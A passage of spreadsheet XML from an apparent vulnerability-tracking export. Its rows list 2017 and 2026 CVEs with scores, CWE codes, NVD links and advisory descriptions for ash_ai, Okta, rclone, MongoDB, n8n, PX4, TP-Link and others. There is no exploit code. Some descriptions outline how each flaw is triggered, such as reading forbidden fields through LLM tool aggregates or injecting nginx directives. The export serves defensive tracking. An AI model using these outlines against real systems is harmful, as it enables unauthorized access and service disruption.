      <c r="E4403" s="5" t="inlineStr"/>
      <c r="F4403" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4403" s="5" t="inlineStr"/>
      <c r="H4403" s="5" t="inlineStr"/>
      <c r="I4403" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4403" s="5" t="inlineStr"/>
      <c r="K4403" s="5" t="inlineStr">
        <is>
          <t>CWE-1220</t>
        </is>
      </c>
      <c r="L4403" s="5" t="inlineStr">
        <is>
          <t>AshAi exposes Ash read actions to language-model tool calls. The read tool accepts an aggregate result type (min, max, sum, avg) that builds an ad-hoc Ash.Query.Aggregate over a named field and returns its raw value.
Ash field policies redact forbidden fields on returned records (replacing them with %Ash.ForbiddenField{}), but that redaction does not apply to aggregate values. A tool caller could therefore read a field the calling actor's field policies forbid by requesting it as an aggregate; min/max in particular return an actual field value. This includes fields that are public? true but restricted per-actor by a field policy, such as sensitive PII. The tool's existing check only required the field to be public, which is a separate axis from per-actor field-policy authorization.
The fix authorizes the aggregated field against the resource's field policies, so aggregating over a field the actor may not see is refused or scoped to the rows where it is visible.
This issue affects ash_ai: from 0.1.0 before 1.0.3.</t>
        </is>
      </c>
      <c r="M4403" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78230</t>
        </is>
      </c>
    </row>
    <row r="4404">
      <c r="A4404" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4404" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78552</t>
        </is>
      </c>
      <c r="C4404" s="5" t="n">
        <v>6</v>
      </c>
      <c r="D4404" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4404" s="5" t="inlineStr"/>
      <c r="F4404" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4404" s="5" t="inlineStr">
        <is>
          <t>nginx, okta</t>
        </is>
      </c>
      <c r="H4404" s="5" t="inlineStr"/>
      <c r="I4404" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4404" s="5" t="inlineStr"/>
      <c r="K4404" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="L4404" s="5" t="inlineStr">
        <is>
          <t>The Okta Access Gateway does not apply its Lua directive restriction to the application-level custom configuration field. The field is interpolated directly into the nginx server block without inspection, resulting in execution of injected directives.</t>
        </is>
      </c>
      <c r="M4404" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78552</t>
        </is>
      </c>
    </row>
    <row r="4405">
      <c r="A4405" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4405" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78622</t>
        </is>
      </c>
      <c r="C4405" s="5" t="n">
        <v>6</v>
      </c>
      <c r="D4405" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4405" s="5" t="inlineStr"/>
      <c r="F4405" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4405" s="5" t="inlineStr">
        <is>
          <t>windows, okta</t>
        </is>
      </c>
      <c r="H4405" s="5" t="inlineStr"/>
      <c r="I4405" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4405" s="5" t="inlineStr"/>
      <c r="K4405" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="L4405" s="5" t="inlineStr">
        <is>
          <t>The Okta Verify for Windows uninstaller does not verify whether the user data directory is a filesystem junction before deleting its contents with elevated privileges. The delete operation follows the junction target, resulting in recursive deletion of unintended directory contents.</t>
        </is>
      </c>
      <c r="M4405" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78622</t>
        </is>
      </c>
    </row>
    <row r="4406">
      <c r="A4406" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4406" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79778</t>
        </is>
      </c>
      <c r="C4406" s="5" t="n">
        <v>6</v>
      </c>
      <c r="D4406" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4406" s="5" t="inlineStr"/>
      <c r="F4406" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4406" s="5" t="inlineStr"/>
      <c r="H4406" s="5" t="inlineStr"/>
      <c r="I4406" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J4406" s="5" t="inlineStr"/>
      <c r="K4406" s="5" t="inlineStr">
        <is>
          <t>CWE-248</t>
        </is>
      </c>
      <c r="L4406" s="5" t="inlineStr">
        <is>
          <t>rclone before v1.75.0 contains a denial of service vulnerability in the WebDAV TUS creation handler that dereferences a nil response before checking for transport errors. A malicious or compromised configured endpoint can reset connections during TUS uploads to trigger a panic that terminates unrecovered goroutines and halts unrelated work in long-lived processes.</t>
        </is>
      </c>
      <c r="M4406" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79778</t>
        </is>
      </c>
    </row>
    <row r="4407">
      <c r="A4407" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4407" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79779</t>
        </is>
      </c>
      <c r="C4407" s="5" t="n">
        <v>6</v>
      </c>
      <c r="D4407" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4407" s="5" t="inlineStr"/>
      <c r="F4407" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4407" s="5" t="inlineStr"/>
      <c r="H4407" s="5" t="inlineStr"/>
      <c r="I4407" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J4407" s="5" t="inlineStr"/>
      <c r="K4407" s="5" t="inlineStr">
        <is>
          <t>CWE-319</t>
        </is>
      </c>
      <c r="L4407" s="5" t="inlineStr">
        <is>
          <t>rclone versions before v1.75.0 fail to reject transport downgrades in redirect handling, allowing Basic authorization and Cookie headers to be replayed over plaintext HTTP after same-host HTTPS-to-HTTP redirects. An on-path attacker observing the plaintext hop can capture and reuse credentials to perform WebDAV operations with the compromised account's permissions.</t>
        </is>
      </c>
      <c r="M4407" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79779</t>
        </is>
      </c>
    </row>
    <row r="4408">
      <c r="A4408" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4408" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79780</t>
        </is>
      </c>
      <c r="C4408" s="5" t="n">
        <v>6</v>
      </c>
      <c r="D4408" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4408" s="5" t="inlineStr"/>
      <c r="F4408" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4408" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H4408" s="5" t="inlineStr"/>
      <c r="I4408" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J4408" s="5" t="inlineStr"/>
      <c r="K4408" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L4408" s="5" t="inlineStr">
        <is>
          <t>rclone before v1.75.0 fails to sanitize IBM IAM bearer tokens and SSE-C encryption keys during S3 redirect callbacks, allowing credentials to be preserved across scheme or host changes. Attackers observing network traffic from a trusted endpoint can capture reusable IBM IAM tokens on same-host HTTPS-to-HTTP downgrades or SSE-C keys on cross-origin redirects to access protected S3 objects.</t>
        </is>
      </c>
      <c r="M4408" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79780</t>
        </is>
      </c>
    </row>
    <row r="4409">
      <c r="A4409" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4409" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82056</t>
        </is>
      </c>
      <c r="C4409" s="5" t="n">
        <v>6</v>
      </c>
      <c r="D4409" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4409" s="5" t="inlineStr"/>
      <c r="F4409" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4409" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="H4409" s="5" t="inlineStr"/>
      <c r="I4409" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4409" s="5" t="inlineStr"/>
      <c r="K4409" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L4409" s="5" t="inlineStr">
        <is>
          <t>A race condition in MongoDB server's text index query parsing can cause a heap use-after-free read when handling upsert retry paths. Under certain concurrent index lifecycle operations, a raw pointer to internal text index metadata may be dereferenced after the underlying structures have been freed, leading to a server crash. An authenticated user with readWrite privileges can trigger this condition through specific concurrent text-search and index management operations, resulting in denial of service for all connected clients. This</t>
        </is>
      </c>
      <c r="M4409" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82056</t>
        </is>
      </c>
    </row>
    <row r="4410">
      <c r="A4410" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4410" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82059</t>
        </is>
      </c>
      <c r="C4410" s="5" t="n">
        <v>6</v>
      </c>
      <c r="D4410" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4410" s="5" t="inlineStr"/>
      <c r="F4410" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4410" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="H4410" s="5" t="inlineStr"/>
      <c r="I4410" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4410" s="5" t="inlineStr"/>
      <c r="K4410" s="5" t="inlineStr">
        <is>
          <t>CWE-617</t>
        </is>
      </c>
      <c r="L4410" s="5" t="inlineStr">
        <is>
          <t>An internal aggregation expression in MongoDB Server was incorrectly registered as accessible to any authenticated user rather than being restricted to internal cluster operations. By crafting a malformed index specification within this expression, an authenticated user with read-only privileges could trigger an assertion failure in the index key generation code path. In certain build configurations, this assertion failure results in termination of the mongod process, causing a denial of service to all connected clients.</t>
        </is>
      </c>
      <c r="M4410" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82059</t>
        </is>
      </c>
    </row>
    <row r="4411">
      <c r="A4411" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4411" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82063</t>
        </is>
      </c>
      <c r="C4411" s="5" t="n">
        <v>6</v>
      </c>
      <c r="D4411" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4411" s="5" t="inlineStr"/>
      <c r="F4411" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4411" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="H4411" s="5" t="inlineStr"/>
      <c r="I4411" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4411" s="5" t="inlineStr"/>
      <c r="K4411" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L4411" s="5" t="inlineStr">
        <is>
          <t>A use-after-free security issue in the cursor management component of MongoDB Server allows an authenticated user to cause a denial of service. Under specific timing conditions during cursor operations, a stale pointer to a freed resource may be retained and subsequently dereferenced during cursor cleanup, leading to a server process crash.</t>
        </is>
      </c>
      <c r="M4411" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82063</t>
        </is>
      </c>
    </row>
    <row r="4412">
      <c r="A4412" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4412" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85622</t>
        </is>
      </c>
      <c r="C4412" s="5" t="n">
        <v>6</v>
      </c>
      <c r="D4412" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4412" s="5" t="inlineStr"/>
      <c r="F4412" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4412" s="5" t="inlineStr"/>
      <c r="H4412" s="5" t="inlineStr"/>
      <c r="I4412" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J4412" s="5" t="inlineStr"/>
      <c r="K4412" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L4412" s="5" t="inlineStr">
        <is>
          <t>AppFlowy-Cloud through 0.9.64 fails to validate workspace membership when establishing WebSocket connections in the establish_ws_connection_v2 handler, allowing authenticated users to bind sessions to workspaces they do not belong to. Attackers can send sync Manifest messages with victim object identifiers to read full document or database state from collaborations in other workspaces without victim involvement.</t>
        </is>
      </c>
      <c r="M4412" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85622</t>
        </is>
      </c>
    </row>
    <row r="4413">
      <c r="A4413" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4413" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86078</t>
        </is>
      </c>
      <c r="C4413" s="5" t="n">
        <v>6</v>
      </c>
      <c r="D4413" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4413" s="5" t="inlineStr"/>
      <c r="F4413" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4413" s="5" t="inlineStr"/>
      <c r="H4413" s="5" t="inlineStr"/>
      <c r="I4413" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4413" s="5" t="inlineStr"/>
      <c r="K4413" s="5" t="inlineStr">
        <is>
          <t>CWE-1321</t>
        </is>
      </c>
      <c r="L4413" s="5" t="inlineStr">
        <is>
          <t>n8n is an open source workflow automation platform. Prior to 2.37.7 and 2.38.2, the Instance AI workflow summary used node names and connection keys from stored workflows as ordinary object keys. A workflow submitted through the REST API could contain __proto__ or constructor, causing nested writes to reach Object.prototype in the main n8n process and disrupt later requests. The affected function is summarizeWorkflowStructure in packages/@n8n/instance-ai/src/tools/workflows/summarize-workflow.ts. This issue is fixed in versions 2.37.7 and 2.38.2.</t>
        </is>
      </c>
      <c r="M4413" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86078</t>
        </is>
      </c>
    </row>
    <row r="4414">
      <c r="A4414" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4414" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86084</t>
        </is>
      </c>
      <c r="C4414" s="5" t="n">
        <v>6</v>
      </c>
      <c r="D4414" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4414" s="5" t="inlineStr"/>
      <c r="F4414" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4414" s="5" t="inlineStr"/>
      <c r="H4414" s="5" t="inlineStr">
        <is>
          <t>n8n:n8n</t>
        </is>
      </c>
      <c r="I4414" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4414" s="5" t="inlineStr"/>
      <c r="K4414" s="5" t="inlineStr">
        <is>
          <t>CWE-288</t>
        </is>
      </c>
      <c r="L4414" s="5" t="inlineStr">
        <is>
          <t>n8n is an open source workflow automation platform. Prior to 1.123.76, 2.37.7, and 2.38.2, the public OIDC login and callback endpoints completed authentication even when OIDC was not the enabled active authentication method. An Enterprise administrator who had configured and later disabled an identity provider still exposed a working route that could issue valid sessions. The affected logic is packages/cli/src/modules/sso-oidc/oidc.service.ee.ts, including generateLoginUrl and the callback flow that lacked assertOidcLoginEnabled. This issue is fixed in versions 1.123.76, 2.37.7 and 2.38.2.</t>
        </is>
      </c>
      <c r="M4414" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86084</t>
        </is>
      </c>
    </row>
    <row r="4415">
      <c r="A4415" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4415" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86096</t>
        </is>
      </c>
      <c r="C4415" s="5" t="n">
        <v>6</v>
      </c>
      <c r="D4415" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4415" s="5" t="inlineStr"/>
      <c r="F4415" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4415" s="5" t="inlineStr"/>
      <c r="H4415" s="5" t="inlineStr"/>
      <c r="I4415" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J4415" s="5" t="inlineStr"/>
      <c r="K4415" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L4415" s="5" t="inlineStr">
        <is>
          <t>PX4 Autopilot through 1.17.0 contains a use-after-free vulnerability in TemperatureCalibration::start() due to a race condition between task spawning and object deletion. Attackers can trigger the calibration process via shell commands to write to freed heap memory, corrupting unrelated objects or allocator metadata and destabilizing heap operations.</t>
        </is>
      </c>
      <c r="M4415" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86096</t>
        </is>
      </c>
    </row>
    <row r="4416">
      <c r="A4416" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4416" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-9033</t>
        </is>
      </c>
      <c r="C4416" s="5" t="n">
        <v>6</v>
      </c>
      <c r="D4416" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4416" s="5" t="inlineStr"/>
      <c r="F4416" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4416" s="5" t="inlineStr"/>
      <c r="H4416" s="5" t="inlineStr">
        <is>
          <t>tp-link:dr3150, tp-link:dr3150_firmware, tp-link:dr3220v-4g, tp-link:dr3220v-4g_firmware, tp-link:dr3650v, tp-link:dr3650v-4g, tp-link:dr3650v-4g_firmware, tp-link:dr3650v_firmware, tp-link:er603wp-4g-outdoor, tp-link:er603wp-4g-outdoor_firmware</t>
        </is>
      </c>
      <c r="I4416" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="J4416" s="5" t="inlineStr"/>
      <c r="K4416" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L4416" s="5" t="inlineStr">
        <is>
          <t>An unauthenticated attacker with network access to the captive portal service of an affected device can terminate active captive portal sessions, including forcing logout of specific users or clearing all active sessions. Affected users must re-authenticate to regain access. 
Successful exploitation may allow termination of individual or all active captive portal sessions, causing temporary service disruption and requiring users to re-authenticate.</t>
        </is>
      </c>
      <c r="M4416" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-9033</t>
        </is>
      </c>
    </row>
    <row r="4417">
      <c r="A4417" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4417" s="5" t="inlineStr">
        <is>
          <t>CVE-2017-4971</t>
        </is>
      </c>
      <c r="C4417" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D4417" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4417" s="5" t="inlineStr"/>
      <c r="F4417" s="5" t="n">
        <v>0.168</v>
      </c>
      <c r="G4417" s="5" t="inlineStr">
        <is>
          <t>spring</t>
        </is>
      </c>
      <c r="H4417" s="5" t="inlineStr">
        <is>
          <t>broadcom:spring_web_flow</t>
        </is>
      </c>
      <c r="I4417" s="5" t="inlineStr">
        <is>
          <t>2017-06-13</t>
        </is>
      </c>
      <c r="J4417" s="5" t="inlineStr"/>
      <c r="K4417" s="5" t="inlineStr">
        <is>
          <t>CWE-1188</t>
        </is>
      </c>
      <c r="L4417" s="5" t="inlineStr">
        <is>
          <t>An issue was discovered in Pivotal Spring Web Flow through 2.4.4. Applications that do not change the value of the MvcViewFactoryCreator useSpringBinding property which is disabled by default (i.e., set to 'false') can be vulnerable to malicious EL expressions in view states that process form submissions but do not have a sub-element to declare explicit data binding property mappings.</t>
        </is>
      </c>
      <c r="M4417" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2017-4971</t>
        </is>
      </c>
    </row>
    <row r="4418">
      <c r="A4418" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4418" s="5" t="inlineStr">
        <is>
          <t>CVE-2017-8039</t>
        </is>
      </c>
      <c r="C4418" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D4418" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4418" s="5" t="inlineStr"/>
      <c r="F4418" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G4418" s="5" t="inlineStr">
        <is>
          <t>spring</t>
        </is>
      </c>
      <c r="H4418" s="5" t="inlineStr">
        <is>
          <t>broadcom:spring_web_flow</t>
        </is>
      </c>
      <c r="I4418" s="5" t="inlineStr">
        <is>
          <t>2017-11-27</t>
        </is>
      </c>
      <c r="J4418" s="5" t="inlineStr"/>
      <c r="K4418" s="5" t="inlineStr">
        <is>
          <t>CWE-1188</t>
        </is>
      </c>
      <c r="L4418" s="5" t="inlineStr">
        <is>
          <t>An issue was discovered in Pivotal Spring Web Flow through 2.4.5. Applications that do not change the value of the MvcViewFactoryCreator useSpringBinding property which is disabled by default (i.e., set to 'false') can be vulnerable to malicious EL expressions in view states that process form submissions but do not have a sub-element to declare explicit data binding property mappings. NOTE: this issue exists because of an incomplete fix for CVE-2017-4971.</t>
        </is>
      </c>
      <c r="M4418" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2017-8039</t>
        </is>
      </c>
    </row>
    <row r="4419">
      <c r="A4419" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4419" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-0307</t>
        </is>
      </c>
      <c r="C4419" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D4419" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4419" s="5" t="inlineStr"/>
      <c r="F4419" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4419" s="5" t="inlineStr">
        <is>
          <t>windows, palo alto</t>
        </is>
      </c>
      <c r="H4419" s="5" t="inlineStr"/>
      <c r="I4419" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J4419" s="5" t="inlineStr"/>
      <c r="K4419" s="5" t="inlineStr">
        <is>
          <t>CWE-426</t>
        </is>
      </c>
      <c r="L4419" s="5" t="inlineStr">
        <is>
          <t>Multiple local privilege escalation vulnerabilities in the Palo Alto Networks GlobalProtect™ app allows a local user to escalate their privileges to NT AUTHORITY\SYSTEM on Windows and root on macOS and Linux. This enables a non-administrative user to execute arbitrary commands with administrative privileges.
This GlobalProtect app on iOS, Android and ChromeOS is not impacted.</t>
        </is>
      </c>
      <c r="M4419" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-0307</t>
        </is>
      </c>
    </row>
    <row r="4420">
      <c r="A4420" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4420" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16004</t>
        </is>
      </c>
      <c r="C4420" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D4420" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4420" s="5" t="inlineStr"/>
      <c r="F4420" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4420" s="5" t="inlineStr"/>
      <c r="H4420" s="5" t="inlineStr"/>
      <c r="I4420" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4420" s="5" t="inlineStr"/>
      <c r="K4420" s="5" t="inlineStr">
        <is>
          <t>CWE-782</t>
        </is>
      </c>
      <c r="L4420" s="5" t="inlineStr">
        <is>
          <t>Exposed IOCTL with Insufficient Access Control in Armoury Crate driver allows a local user to read and write arbitrary PCI/PCIe configuration space via crafted IOCTL requests by bypassing the driver's verification.
Refer to the '
Security Update for Armoury Crate App' section on the ASUS Security Advisory for more information.</t>
        </is>
      </c>
      <c r="M4420" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16004</t>
        </is>
      </c>
    </row>
    <row r="4421">
      <c r="A4421" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4421" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18149</t>
        </is>
      </c>
      <c r="C4421" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D4421" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4421" s="5" t="inlineStr"/>
      <c r="F4421" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4421" s="5" t="inlineStr"/>
      <c r="H4421" s="5" t="inlineStr"/>
      <c r="I4421" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J4421" s="5" t="inlineStr"/>
      <c r="K4421" s="5" t="inlineStr">
        <is>
          <t>CWE-772</t>
        </is>
      </c>
      <c r="L4421" s="5" t="inlineStr">
        <is>
          <t>undici's retry handler can leave an already-exposed response body pending forever. When a server returns a successful response that declares a Content-Length, sends only part of the body, and closes the connection, the retry handler retries the request. If the retry returns a non-retryable status such as 400, the handler forwards that new response downstream and replaces its internal response stream, but the original response body that the application still holds is never ended or destroyed. As a result calls that read that body never settle, and the configured body timeout does not fire because its timer is tied to the connection parser rather than the orphaned body. An attacker-controlled server can trigger this with two short responses without keeping a connection open, and repeated requests accumulate pending promises and streams that can exhaust application concurrency or memory. This affects undici versions from 7.11.0 up to 7.29.1 and from 8.0.0 up to 8.10.2. Users should upgrade to undici 7.29.1 or 8.10.2.</t>
        </is>
      </c>
      <c r="M4421" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18149</t>
        </is>
      </c>
    </row>
    <row r="4422">
      <c r="A4422" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4422" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19596</t>
        </is>
      </c>
      <c r="C4422" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D4422" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4422" s="5" t="inlineStr"/>
      <c r="F4422" s="5" t="inlineStr"/>
      <c r="G4422" s="5" t="inlineStr"/>
      <c r="H4422" s="5" t="inlineStr"/>
      <c r="I4422" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J4422" s="5" t="inlineStr"/>
      <c r="K4422" s="5" t="inlineStr">
        <is>
          <t>CWE-611</t>
        </is>
      </c>
      <c r="L4422" s="5" t="inlineStr">
        <is>
          <t>An XML External Entity (XXE) vulnerability exists in the XML collector of multiple versions of OpenNMS Meridian and Horizon. When OpenNMS collects XML from a source whose response is attacker-controlled (for example a compromised monitored host or an HTTP man-in-the-middle position), the collector's XML parser resolves external entities and external DTDs. This allows an attacker to read files accessible to the OpenNMS service account, including database credentials, and to induce out-of-band requests.
The solution is to upgrade to Meridian 2024.3.13, 2025.0.10 and Horizon 36.0.4 or newer. Meridian and Horizon installation instructions state that they are intended for installation within an organization's private networks and should not be directly accessible from the Internet.</t>
        </is>
      </c>
      <c r="M4422" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19596</t>
        </is>
      </c>
    </row>
    <row r="4423">
      <c r="A4423" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4423" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-21105</t>
        </is>
      </c>
      <c r="C4423" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D4423" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4423" s="5" t="inlineStr"/>
      <c r="F4423" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4423" s="5" t="inlineStr"/>
      <c r="H4423" s="5" t="inlineStr"/>
      <c r="I4423" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4423" s="5" t="inlineStr"/>
      <c r="K4423" s="5" t="inlineStr">
        <is>
